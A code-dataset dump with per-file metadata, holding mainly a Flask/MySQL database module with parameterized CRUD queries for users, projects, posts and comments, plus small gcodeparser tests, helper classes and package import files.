| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
e0e16d42e3500128ea2775fb38369a6c687fcf51
| 16,116
|
py
|
Python
|
flask-backend/database.py
|
gvdijk/Project-Web-Mobile
|
5433a7329b93e7ddfe29fa20642ba97a932bf9ee
|
[
"MIT"
] | null | null | null |
flask-backend/database.py
|
gvdijk/Project-Web-Mobile
|
5433a7329b93e7ddfe29fa20642ba97a932bf9ee
|
[
"MIT"
] | 4
|
2021-03-09T04:56:38.000Z
|
2022-02-17T23:47:04.000Z
|
flask-backend/database.py
|
gvdijk/Project-Web-Mobile
|
5433a7329b93e7ddfe29fa20642ba97a932bf9ee
|
[
"MIT"
] | null | null | null |
import mysql.connector
from mysql.connector.pooling import MySQLConnectionPool
connectionPool = None
def init(user, password, host, database):
    """Initialise the module-level MySQL connection pool.

    Must be called once at application start-up, before getConnection().
    """
    global connectionPool
    connectionPool = MySQLConnectionPool(
        pool_name='connection_pool',
        pool_size=10,
        pool_reset_session=True,
        host=host,
        user=user,
        password=password,
        database=database,
    )
def getConnection():
    """Borrow a connection from the pool; callers must close() it to return it."""
    return connectionPool.get_connection()
# -----------------------------------------Login Related Functions--------------------------------------- #
def getUserByName(name):
    """Return the non-deleted user row matching *name* exactly, or None.

    Used by the login flow; the row includes the password hash column.
    """
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    cur.execute(
        "SELECT * FROM user WHERE userDeleted = 0 AND userName = %s",
        (name,),
    )
    row = cur.fetchone()
    cur.close()
    connection.close()
    # fetchone() yields None when no row matched; normalise empties to None too.
    return row if row else None
# -----------------------------------------User Related Functions---------------------------------------- #
def getUserByID(id):
    """Return a non-deleted user's public fields by ID, or None if not found."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    # Parameterized query: the previous "+ id" string concatenation was
    # SQL-injectable with an attacker-controlled id.
    sql = "SELECT userCreated, userID, userName, userPicture FROM user WHERE userDeleted = 0 AND userID = %s"
    cur.execute(sql, (id,))
    results = cur.fetchone()
    cur.close()
    connection.close()
    return results or None
def getUserInfo(id):
    """Return a non-deleted user's public fields by ID, or None if not found.

    NOTE(review): identical to getUserByID; kept as a separate name because
    callers may use either.
    """
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    # Parameterized query replaces the SQL-injectable "+ id" concatenation.
    sql = "SELECT userCreated, userID, userName, userPicture FROM user WHERE userDeleted = 0 AND userID = %s"
    cur.execute(sql, (id,))
    results = cur.fetchone()
    cur.close()
    connection.close()
    return results or None
def addUser(name, password):
    """Insert a new user and return its freshly-stored public record."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    cur.execute(
        "INSERT INTO user(userName, userPass) VALUES(%s, %s)",
        (name, password),
    )
    connection.commit()
    new_id = cur.lastrowid
    cur.close()
    connection.close()
    # Re-read through the standard accessor so the caller gets the same shape
    # as any other user lookup.
    return getUserByID(str(new_id))
def getUserProjects(id):
    """Return all non-deleted project memberships of a user, or None if none."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    # Parameterized query replaces the SQL-injectable "+ id" concatenation.
    sql = "SELECT * FROM projectuser WHERE projectuserDeleted = 0 AND User_userID = %s"
    cur.execute(sql, (id,))
    results = cur.fetchall()
    cur.close()
    connection.close()
    return results or None
def getUserPosts(id):
    """Return all non-deleted posts written by a user, or None if none."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    # Parameterized query replaces the SQL-injectable "+ id" concatenation.
    sql = "SELECT * FROM post WHERE postDeleted = 0 AND postUser = %s"
    cur.execute(sql, (id,))
    results = cur.fetchall()
    cur.close()
    connection.close()
    return results or None
def getUserComments(id):
    """Return a user's visible comments (not soft-deleted, not in DELETED state), or None."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    # Parameterized query replaces the SQL-injectable "+ id" concatenation.
    sql = "SELECT * FROM comment WHERE commentDeleted = 0 AND NOT commentState = 'DELETED' AND commentUser = %s"
    cur.execute(sql, (id,))
    results = cur.fetchall()
    cur.close()
    connection.close()
    return results or None
def getUser(name, limit, offset):
    """Search non-deleted users, optionally filtered by a name substring.

    limit/offset are optional paging values (strings or ints); offset is only
    honoured when limit is given, matching the original contract.
    Returns a list of public user rows ordered by name, or None when empty.
    """
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    sql = "SELECT userID, userName, userPicture, userCreated FROM user "\
          "WHERE userDeleted = 0"
    data = ()
    if name is not None:
        sql += " AND userName LIKE %s"
        data = data + ("%" + name + "%",)
    sql += " ORDER BY userName"
    if limit is not None:
        # int() rejects non-numeric input; LIMIT/OFFSET cannot be bound as
        # placeholders in all connectors, so validate-then-embed.
        sql += " LIMIT " + str(int(limit))
        if offset is not None:
            sql += " OFFSET " + str(int(offset))
    cur.execute(sql, data)
    results = cur.fetchall()
    cur.close()
    connection.close()
    return results or None
def updateUser(id, name, password):
    """Update a user's name and password, returning the refreshed record."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    # Parameterize the WHERE clause too — the old "+ id" was SQL-injectable.
    sql = "UPDATE user SET userName = %s, userPass = %s WHERE userID = %s"
    cur.execute(sql, (name, password, id))
    connection.commit()
    user = getUserByID(id)
    cur.close()
    connection.close()
    return user
def deleteUser(id):
    """Soft-delete a user (sets userDeleted). Returns True on success, False on error."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    try:
        # Parameterized query replaces the SQL-injectable "+ id" concatenation.
        cur.execute("UPDATE user SET userDeleted = true WHERE userID = %s", (id,))
        connection.commit()
        return True
    except Exception as e:
        print(e)
        return False
    finally:
        # finally guarantees cleanup on both paths (was duplicated before).
        cur.close()
        connection.close()
# ---------------------------------------Project Related Functions--------------------------------------- #
def addProject(name, description, visibility, owner):
    """Create a project and return the stored project record."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    cur.execute(
        "INSERT INTO project(projectName, projectDescription, projectVisibility, projectOwner) VALUES(%s, %s, %s, %s)",
        (name, description, visibility, owner),
    )
    connection.commit()
    new_id = cur.lastrowid
    cur.close()
    connection.close()
    return getProjectByID(str(new_id))
def addProjectPost(title, content, owner, projectID):
    """Create a post inside a project and return the stored post record."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    cur.execute(
        "INSERT INTO post(postTitle, postContent, postUser, postProject) VALUES(%s, %s, %s, %s)",
        (title, content, owner, projectID),
    )
    connection.commit()
    new_id = cur.lastrowid
    cur.close()
    connection.close()
    return getPostByID(str(new_id))
def addProjectUser(userID, projectID, role):
    """Add a user to a project with the given role; return the membership row."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    cur.execute(
        "INSERT INTO projectuser(User_userID, Project_projectID, projectuserRole) VALUES(%s, %s, %s)",
        (userID, projectID, role),
    )
    connection.commit()
    cur.close()
    connection.close()
    # Bug fix: getProjectUserByID expects (userID, projectID); the old code
    # passed the projectuser row's auto-increment id instead of the user id,
    # so the lookup could never match the inserted membership.
    return getProjectUserByID(str(userID), str(projectID))
def getProjectsCount(name):
    """Count visible (PUBLIC/RESTRICTED, non-deleted) projects, optionally
    filtered by a name substring. Returns a {'count': n} row."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    query = "SELECT count(*) as count FROM project "\
            "WHERE projectDeleted = 0 AND (projectVisibility = 'PUBLIC' OR projectVisibility = 'RESTRICTED')"
    params = ()
    if name is not None:
        query += " AND projectName LIKE %s"
        params = params + ("%" + name + "%",)
    query += " ORDER BY projectName"
    cur.execute(query, params)
    row = cur.fetchone()
    cur.close()
    connection.close()
    return row if row else None
def getProjects(name, limit, offset):
    """List visible (PUBLIC/RESTRICTED, non-deleted) projects, newest first.

    Optional name substring filter and limit/offset paging (offset only applies
    when limit is given). Returns a list of rows or None when empty.
    """
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    sql = "SELECT * FROM project "\
          "WHERE projectDeleted = 0 AND (projectVisibility = 'PUBLIC' OR projectVisibility = 'RESTRICTED')"
    data = ()
    if name is not None:
        sql += " AND projectName LIKE %s"
        data = data + ("%" + name + "%",)
    sql += " ORDER BY projectCreated DESC"
    if limit is not None:
        # int() validation replaces the SQL-injectable raw concatenation of
        # limit/offset request strings.
        sql += " LIMIT " + str(int(limit))
        if offset is not None:
            sql += " OFFSET " + str(int(offset))
    cur.execute(sql, data)
    results = cur.fetchall()
    cur.close()
    connection.close()
    return results or None
def getProjectByID(id):
    """Return a non-deleted project row by ID, or None if not found."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    # Parameterized query replaces the SQL-injectable "+ id" concatenation.
    cur.execute("SELECT * FROM project WHERE projectDeleted = 0 AND projectID = %s", (id,))
    results = cur.fetchone()
    cur.close()
    connection.close()
    return results or None
def getProjectUsers(id):
    """Return all active membership rows of a project, or None if none."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    # Parameterized query replaces the SQL-injectable "+ id" concatenation.
    cur.execute("SELECT * FROM projectuser WHERE projectuserDeleted = 0 AND Project_projectID = %s", (id,))
    results = cur.fetchall()
    cur.close()
    connection.close()
    return results or None
def getProjectUserByID(userID, projectID):
    """Return the active membership row linking a user and a project, or None."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    cur.execute(
        "SELECT * FROM projectuser WHERE projectuserDeleted = 0 AND Project_projectID = %s AND User_userID = %s",
        (projectID, userID),
    )
    row = cur.fetchone()
    cur.close()
    connection.close()
    return row if row else None
def getProjectPostsCount(id):
    """Return {'count': n} of non-deleted posts in a project, or None."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    # Parameterized query replaces the SQL-injectable "+ id" concatenation.
    cur.execute("SELECT count(*) as count FROM post WHERE postDeleted = 0 AND postProject = %s", (id,))
    results = cur.fetchone()
    cur.close()
    connection.close()
    return results or None
def getProjectPosts(id, limit, offset):
    """Page through a project's non-deleted posts, oldest first.

    offset only applies when limit is given (original contract). Returns a
    list of rows or None when empty.
    """
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    # Parameterize the project id; validate limit/offset with int() — both
    # were previously concatenated raw into the SQL (injectable).
    sql = "SELECT * FROM post WHERE postDeleted = 0 AND postProject = %s ORDER BY postCreated"
    if limit is not None:
        sql += " LIMIT " + str(int(limit))
        if offset is not None:
            sql += " OFFSET " + str(int(offset))
    cur.execute(sql, (id,))
    results = cur.fetchall()
    cur.close()
    connection.close()
    return results or None
def updateProject(id, title, content, visibility):
    """Update a project's name, description and visibility; return the fresh row."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    # Parameterize the WHERE clause too — the old "+ id" was SQL-injectable.
    sql = "UPDATE project SET projectName = %s, projectDescription = %s, projectVisibility = %s WHERE projectID = %s"
    cur.execute(sql, (title, content, visibility, id))
    connection.commit()
    project = getProjectByID(id)
    cur.close()
    connection.close()
    return project
def updateProjectUser(projectID, userID, role):
    """Change a member's role within a project and return the updated row."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    cur.execute(
        "UPDATE projectuser SET projectuserRole = %s WHERE User_userID = %s AND Project_projectID = %s",
        (role, userID, projectID),
    )
    connection.commit()
    # Re-read the row so the caller sees the persisted state.
    cur.execute(
        "SELECT * FROM projectuser WHERE projectuserDeleted = 0 AND Project_projectID = %s AND User_userID = %s",
        (projectID, userID),
    )
    row = cur.fetchone()
    cur.close()
    connection.close()
    return row
def deleteProject(id):
    """Soft-delete a project. Returns True on success, False on error."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    try:
        # Parameterized query replaces the SQL-injectable "+ id" concatenation.
        cur.execute("UPDATE project SET projectDeleted = true WHERE projectID = %s", (id,))
        connection.commit()
        return True
    except Exception as e:
        print(e)
        return False
    finally:
        # finally guarantees cleanup on both paths (was duplicated before).
        cur.close()
        connection.close()
def deleteProjectUser(projectID, userID):
    """Hard-delete a project membership row. Returns True on success, False on error."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    try:
        cur.execute(
            "DELETE FROM projectuser WHERE Project_projectID = %s AND User_userID = %s",
            (projectID, userID),
        )
        connection.commit()
        return True
    except Exception as e:
        print(e)
        return False
    finally:
        # Cleanup runs on both the success and the error path.
        cur.close()
        connection.close()
# -----------------------------------------Post Related Functions---------------------------------------- #
def addPostComment(content, parentID, userID, id):
    """Insert a comment (optionally replying to parentID) on post *id*;
    return the stored comment row."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    cur.execute(
        "INSERT INTO comment(commentContent, commentUser, commentParent, commentPost) VALUES(%s, %s, %s, %s)",
        (content, userID, parentID, id),
    )
    connection.commit()
    new_id = cur.lastrowid
    cur.close()
    connection.close()
    return getCommentByID(str(new_id))
def getPostByID(id):
    """Return a non-deleted post by ID, or None.

    A post is hidden when its parent project no longer resolves (deleted).
    """
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    # Parameterized query replaces the SQL-injectable "+ id" concatenation.
    cur.execute("SELECT * FROM post WHERE postDeleted = 0 AND postID = %s", (id,))
    results = cur.fetchone()
    cur.close()
    connection.close()
    if results is not None:
        # Visibility follows the project: no project, no post.
        if getProjectByID(str(results['postProject'])) is None:
            results = None
    return results or None
def getPostComments(id):
    """Return all non-deleted comments on a post, or None if none."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    # Parameterized query replaces the SQL-injectable "+ id" concatenation.
    cur.execute("SELECT * FROM comment WHERE commentDeleted = 0 AND commentPost = %s", (id,))
    results = cur.fetchall()
    cur.close()
    connection.close()
    return results or None
def updatePost(id, content):
    """Replace a post's content and return the refreshed post row."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    # Parameterize the WHERE clause too — the old "+ id" was SQL-injectable.
    cur.execute("UPDATE post SET postContent = %s WHERE postID = %s", (content, id))
    connection.commit()
    result = getPostByID(id)
    cur.close()
    connection.close()
    return result
def deletePost(id):
    """Soft-delete a post. Returns True on success, False on error."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    try:
        # Parameterized query replaces the SQL-injectable "+ id" concatenation.
        cur.execute("UPDATE post SET postDeleted = true WHERE postID = %s", (id,))
        connection.commit()
        return True
    except Exception as e:
        print(e)
        return False
    finally:
        # finally guarantees cleanup on both paths (was duplicated before).
        cur.close()
        connection.close()
def deltePostComments(id):
    """Soft-delete every comment attached to a post. Returns True on success.

    NOTE(review): the misspelled name ("delte") is kept deliberately —
    renaming would break existing callers.
    """
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    try:
        # Parameterized query replaces the SQL-injectable "+ id" concatenation.
        cur.execute("UPDATE comment SET commentDeleted = true WHERE commentPost = %s", (id,))
        connection.commit()
        return True
    except Exception as e:
        print(e)
        return False
    finally:
        cur.close()
        connection.close()
# ---------------------------------------Comment Related Functions--------------------------------------- #
def getCommentByID(id):
    """Return a non-deleted comment row by ID, or None if not found."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    # Parameterized query replaces the SQL-injectable "+ id" concatenation.
    cur.execute("SELECT * FROM comment WHERE commentDeleted = 0 AND commentID = %s", (id,))
    results = cur.fetchone()
    cur.close()
    connection.close()
    return results or None
def updateComment(id, content):
    """Replace a comment's content, stamp commentEdited, return the fresh row."""
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    # Both statements previously concatenated the raw id (SQL-injectable);
    # bind it as a parameter in each.
    cur.execute(
        "UPDATE comment SET commentContent = %s, commentEdited = current_timestamp() WHERE commentID = %s",
        (content, id),
    )
    connection.commit()
    cur.execute("SELECT * FROM comment WHERE commentDeleted = 0 AND commentID = %s", (id,))
    result = cur.fetchone()
    cur.close()
    connection.close()
    return result
def deleteComment(id):
    """Mark a comment DELETED and blank its content with a placeholder.

    The Dutch placeholder text is user-facing and preserved verbatim.
    Returns True on success, False on error.
    """
    connection = getConnection()
    cur = connection.cursor(dictionary=True)
    try:
        # Parameterized query replaces the SQL-injectable "+ id" concatenation.
        cur.execute(
            "UPDATE comment SET commentContent = 'Deze reactie is verwijderd', commentState = 'DELETED' WHERE commentID = %s",
            (id,),
        )
        connection.commit()
        return True
    except Exception as e:
        print(e)
        return False
    finally:
        cur.close()
        connection.close()
| 30.580645
| 130
| 0.618764
| 1,740
| 16,116
| 5.720115
| 0.091379
| 0.031347
| 0.070532
| 0.090124
| 0.767306
| 0.751532
| 0.735155
| 0.724405
| 0.714458
| 0.669949
| 0
| 0.003155
| 0.252668
| 16,116
| 526
| 131
| 30.638783
| 0.823231
| 0.032452
| 0
| 0.759657
| 0
| 0.006438
| 0.198511
| 0.003016
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075107
| false
| 0.017167
| 0.004292
| 0.002146
| 0.201717
| 0.012876
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
1ca114af0fa1c21bf0564af2fcf7a1467936ae19
| 47
|
py
|
Python
|
oommffield/__init__.py
|
joommf-attic/oommffield
|
95a6e1c2d795f884748d33c90134c18d8aeb73a2
|
[
"BSD-2-Clause"
] | 1
|
2016-08-08T14:47:38.000Z
|
2016-08-08T14:47:38.000Z
|
oommffield/__init__.py
|
joommf/oommffield
|
95a6e1c2d795f884748d33c90134c18d8aeb73a2
|
[
"BSD-2-Clause"
] | 1
|
2018-04-26T15:42:54.000Z
|
2018-04-30T18:07:31.000Z
|
oommffield/__init__.py
|
joommf-attic/oommffield
|
95a6e1c2d795f884748d33c90134c18d8aeb73a2
|
[
"BSD-2-Clause"
] | null | null | null |
from .oommffield import Field, read_oommf_file
| 23.5
| 46
| 0.851064
| 7
| 47
| 5.428571
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106383
| 47
| 1
| 47
| 47
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1ca8a6ff43bad4a06a7c5ee86fcc747edab73f32
| 195
|
py
|
Python
|
test/python/topology/test_common_namespace/package1/common_namespace/module1.py
|
Jaimie-Jin1/streamsx.topology
|
6f316ec8e9ed1349c6f061d9bb7d03deb87e3d08
|
[
"Apache-2.0"
] | 31
|
2015-06-24T06:21:14.000Z
|
2020-08-28T21:45:50.000Z
|
test/python/topology/test_common_namespace/package1/common_namespace/module1.py
|
Jaimie-Jin1/streamsx.topology
|
6f316ec8e9ed1349c6f061d9bb7d03deb87e3d08
|
[
"Apache-2.0"
] | 1,203
|
2015-06-15T02:11:49.000Z
|
2021-03-22T09:47:54.000Z
|
test/python/topology/test_common_namespace/package1/common_namespace/module1.py
|
Jaimie-Jin1/streamsx.topology
|
6f316ec8e9ed1349c6f061d9bb7d03deb87e3d08
|
[
"Apache-2.0"
] | 53
|
2015-05-28T21:14:16.000Z
|
2021-12-23T12:58:59.000Z
|
# Licensed Materials - Property of IBM
# Copyright IBM Corp. 2016
class SourceTuples:
    """Callable fixture that returns a fixed sequence of tuples.

    Instances are used as zero-argument sources: calling the instance
    yields the sequence it was constructed with.
    """

    def __init__(self, tuples=None):
        # The original used a mutable default (`tuples=[]`), so every
        # instance built without arguments shared one list object.
        # Use a None sentinel and allocate a fresh list per instance.
        self.tuples = [] if tuples is None else tuples

    def __call__(self):
        """Return the stored sequence of tuples."""
        return self.tuples
| 24.375
| 38
| 0.692308
| 24
| 195
| 5.291667
| 0.666667
| 0.23622
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026144
| 0.215385
| 195
| 7
| 39
| 27.857143
| 0.803922
| 0.312821
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
1c2a09853855265f7dee755f163a430ff190c8dc
| 116
|
py
|
Python
|
src/app/forms/__init__.py
|
schwetzen/liblr
|
408235a4f539a05f54f0376dbf9dbcd83957db03
|
[
"Apache-2.0"
] | null | null | null |
src/app/forms/__init__.py
|
schwetzen/liblr
|
408235a4f539a05f54f0376dbf9dbcd83957db03
|
[
"Apache-2.0"
] | 1
|
2018-12-07T22:15:28.000Z
|
2018-12-07T22:15:28.000Z
|
src/app/forms/__init__.py
|
schwetzen/liblr
|
408235a4f539a05f54f0376dbf9dbcd83957db03
|
[
"Apache-2.0"
] | 2
|
2018-12-07T20:59:53.000Z
|
2018-12-17T21:02:21.000Z
|
from app.forms.auth import RegisterForm
from app.forms.readingtip import ReadingTipCreateForm, ReadingTipUpdateForm
| 38.666667
| 75
| 0.87931
| 13
| 116
| 7.846154
| 0.692308
| 0.137255
| 0.235294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077586
| 116
| 2
| 76
| 58
| 0.953271
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1c4c682149faba9396186e89a135bf56202c82c5
| 689
|
py
|
Python
|
test/test_element_type.py
|
gleb-svechnikov/GcodeParser
|
36a36ef935b3570f8ca7cece70a4eb0900f8c8c1
|
[
"MIT"
] | 2
|
2021-12-04T01:24:42.000Z
|
2022-03-11T09:29:24.000Z
|
test/test_element_type.py
|
gleb-svechnikov/GcodeParser
|
36a36ef935b3570f8ca7cece70a4eb0900f8c8c1
|
[
"MIT"
] | 3
|
2021-02-12T23:56:07.000Z
|
2021-06-24T09:45:40.000Z
|
test/test_element_type.py
|
gleb-svechnikov/GcodeParser
|
36a36ef935b3570f8ca7cece70a4eb0900f8c8c1
|
[
"MIT"
] | 3
|
2021-06-16T21:26:43.000Z
|
2021-12-04T01:37:04.000Z
|
from gcodeparser.gcode_parser import (
element_type,
)
# Each test pins the Python type that element_type() infers for one literal form.
def test_element_type_int():
    assert element_type('109321') == int


def test_element_type_neg_int():
    assert element_type('-109321') == int


def test_element_type_float():
    assert element_type('109321.0') == float


def test_element_type_float2():
    assert element_type('109321.012345') == float


def test_element_type_neg_float():
    assert element_type('-1.0') == float


def test_element_type_neg_float2():
    assert element_type('-1.013456') == float


def test_element_type_str():
    # Dotted but non-numeric input (an IP address) falls back to str.
    assert element_type('192.168.0.1') == str


def test_element_type_str2():
    assert element_type('"test string"') == str
| 19.138889
| 49
| 0.716981
| 98
| 689
| 4.663265
| 0.244898
| 0.40919
| 0.245077
| 0.315098
| 0.431072
| 0.374179
| 0.205689
| 0.205689
| 0.205689
| 0.205689
| 0
| 0.087629
| 0.155298
| 689
| 35
| 50
| 19.685714
| 0.697595
| 0
| 0
| 0
| 0
| 0
| 0.103048
| 0
| 0
| 0
| 0
| 0
| 0.421053
| 1
| 0.421053
| true
| 0
| 0.052632
| 0
| 0.473684
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
98c48d842cc8b861f9856bec283fac932d83023f
| 95
|
py
|
Python
|
rvpvp/isa/__init__.py
|
ultrafive/riscv-pvp
|
843e38422c3d545352b955764927d5e7847e5453
|
[
"Unlicense"
] | 5
|
2021-05-10T09:57:00.000Z
|
2021-10-05T14:39:20.000Z
|
rvpvp/isa/__init__.py
|
ultrafive/riscv-pvp
|
843e38422c3d545352b955764927d5e7847e5453
|
[
"Unlicense"
] | null | null | null |
rvpvp/isa/__init__.py
|
ultrafive/riscv-pvp
|
843e38422c3d545352b955764927d5e7847e5453
|
[
"Unlicense"
] | 1
|
2021-05-14T20:24:11.000Z
|
2021-05-14T20:24:11.000Z
|
from .rvi import *
from .rvm import *
from .rvf import *
from .rvc import *
from .rvv import *
| 15.833333
| 18
| 0.684211
| 15
| 95
| 4.333333
| 0.466667
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 95
| 5
| 19
| 19
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
98d553e01c3261bad7f65953eecd7fd6a37e16ba
| 191
|
py
|
Python
|
nexoclom/modelcode/__init__.py
|
mburger-stsci/NExoCloM
|
c0c81eeb04c5571662f3d86337d84a18f1cd0dcf
|
[
"BSD-3-Clause"
] | null | null | null |
nexoclom/modelcode/__init__.py
|
mburger-stsci/NExoCloM
|
c0c81eeb04c5571662f3d86337d84a18f1cd0dcf
|
[
"BSD-3-Clause"
] | null | null | null |
nexoclom/modelcode/__init__.py
|
mburger-stsci/NExoCloM
|
c0c81eeb04c5571662f3d86337d84a18f1cd0dcf
|
[
"BSD-3-Clause"
] | 1
|
2018-11-23T20:55:33.000Z
|
2018-11-23T20:55:33.000Z
|
from nexoclom.modelcode.Input import Input
from nexoclom.modelcode.Output import Output
from nexoclom.modelcode.LOSResult import LOSResult
from nexoclom.modelcode.ModelImage import ModelImage
| 47.75
| 52
| 0.879581
| 24
| 191
| 7
| 0.333333
| 0.285714
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078534
| 191
| 4
| 52
| 47.75
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
c72d21a0f597edf318e575dca5ff141ef883b00b
| 166
|
py
|
Python
|
product/product_quantity.py
|
saiihamza/open_data_parsing
|
6757c6c6823a0523ca1d2af79e99b761b57a794d
|
[
"Apache-2.0"
] | null | null | null |
product/product_quantity.py
|
saiihamza/open_data_parsing
|
6757c6c6823a0523ca1d2af79e99b761b57a794d
|
[
"Apache-2.0"
] | null | null | null |
product/product_quantity.py
|
saiihamza/open_data_parsing
|
6757c6c6823a0523ca1d2af79e99b761b57a794d
|
[
"Apache-2.0"
] | null | null | null |
class ProductQuantity(object):
    """Thin wrapper holding a product quantity in its raw string form.

    The quantity is stored verbatim; ``str()`` of an instance yields it
    back unchanged.
    """

    def __init__(self, str_quantity):
        # Attribute name `StrQuantity` is part of the public interface
        # (callers may read it), so it is kept as-is.
        self.StrQuantity = str_quantity

    def __str__(self):
        return self.StrQuantity
| 20.75
| 39
| 0.692771
| 18
| 166
| 5.833333
| 0.555556
| 0.209524
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.228916
| 166
| 7
| 40
| 23.714286
| 0.820313
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
c737cce3e4f31e689313aeb49525ae650d73d35b
| 130
|
py
|
Python
|
declare_qtquick/widgets/api/qt/labs/folderlistmodel/__init__.py
|
likianta/declare-qtquick
|
93c2ce49d841ccdeb0272085c5f731139927f0d7
|
[
"MIT"
] | 3
|
2021-11-02T03:45:27.000Z
|
2022-03-27T05:33:36.000Z
|
declare_qtquick/widgets/api/qt/labs/folderlistmodel/__init__.py
|
likianta/declare-qtquick
|
93c2ce49d841ccdeb0272085c5f731139927f0d7
|
[
"MIT"
] | null | null | null |
declare_qtquick/widgets/api/qt/labs/folderlistmodel/__init__.py
|
likianta/declare-qtquick
|
93c2ce49d841ccdeb0272085c5f731139927f0d7
|
[
"MIT"
] | null | null | null |
from __declare_qtquick_internals__ import qml_imports
